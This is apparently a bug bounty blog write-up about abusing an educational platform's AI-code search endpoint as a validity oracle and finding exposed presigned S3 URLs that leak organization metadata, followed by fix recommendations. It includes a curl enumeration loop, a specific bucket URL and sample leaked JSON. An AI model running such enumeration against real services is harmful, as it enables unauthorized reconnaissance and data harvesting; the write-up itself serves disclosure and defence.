How I Turned an AI Search Endpoint into an Internal Org Intel Leak

At first, it looked like nothing.

shxsu1

~3 min read · April 18, 2026 (Updated: April 18, 2026) · Free: Yes

Just another endpoint:

/pine/aisearch?aicode=XXXXXX

Simple input. Simple output. Nothing interesting… until it was.

The Spark

I was testing it from a normal student account.

The behavior was straightforward:

Send an aicode
Get a response with hits.total

But then something stood out:

hits.total = 0 → invalid code
hits.total > 0 → valid code

That's when it clicked.

This wasn't just a search endpoint.

It was an oracle.

Phase 1 — Turning It into an Enumeration Machine

The AI code format:

^\d{6}[\dA-Z]{6}$

The first 6 digits? That's the key.

Instead of brute-forcing 10¹² combinations, I only needed to scan 10⁰⁶ prefixes.

That's not brute force anymore. That's feasibility.

Quick script:

for i in {000000..999999}; do
  response=$(curl -s "https://[app]/pine/aisearch?aicode=${i}XXXXXX")
  if echo "$response" | grep -q '"total":1'; then
    echo "[+] Valid prefix found: $i"
  fi
done

And just like that… valid prefixes start revealing themselves.

Phase 2 — The Unexpected Door (S3)

While tracing the backend flow, something more interesting showed up.

The server was generating presigned AWS S3 URLs.

Example:

https://cb-cds-org-update-pine.s3.us-east-1.amazonaws.com/1008877/ais_1008877.json?X-Amz-...

What makes this worse?

No authentication required
No cookies
Accessible by anyone with the link
Valid for 1 full hour

If that URL leaks… it's done.

Phase 3 — What's Inside?

Opening the JSON turned this from a minor bug into something else entirely.

{
  "orgId": "1008877",
  "aiCodes": [
    {
      "aiCd": "098522",
      "aiLevelCd": "2",
      "aiSourceCd": "CC",
      "aiStatusCd": "2",
      "apEligibilityInd": "Y",
      "psatEligibilityInd": "Y",
      "satEligibilityInd": "Y",
      "clepEligibilityInd": "Y",
      "annualReviewInd": "N",
      "initialIngestionPathCd": "1",
      "ssdEligibilityInd": "Y"
    }
  ]
}

This isn't just data.

This is:

Internal organization IDs
Valid AI codes
Program eligibility logic (AP / SAT / PSAT / CLEP / SSD)
Operational flags
System behavior hints

In other words… a blueprint.

Why This Matters (Even Without PII)

A common mistake is downplaying bugs like this because "there's no personal data."

That's missing the point.

1. Attack Surface Reduction

Instead of guessing blindly, you now have valid prefixes.

2. System Logic Exposure

You understand how eligibility decisions are structured.

3. Reconnaissance Advantage

Small leaks combine into a full system map.

4. Chaining Potential

This isn't the attack. This enables future attacks.

The Real Issue

The problem wasn't just S3. And it wasn't just the endpoint.

It was the combination:

An endpoint acting as an oracle
No rate limiting
Presigned URLs exposed to the client
Overly verbose JSON responses

That combination turned a simple feature… into a scalable vulnerability.

How I'd Fix It

Immediate

Add strict rate limiting (e.g., 10 requests/minute per user)
Revoke all existing presigned URLs

Short-term

Stop exposing S3 URLs to clients
Proxy requests through the backend
Return only necessary fields

Medium-term

Sanitize S3 payloads
Remove internal metadata fields
Add logging and anomaly detection for enumeration patterns

Final Thought

The most dangerous vulnerabilities aren't the ones that break systems.

They're the ones that teach you how the system works.

Because once the system starts explaining itself… you're no longer attacking it.

You're reading it.

#bugbounty-writeup #infosec #bug-bounty #ethical-hacking #hacking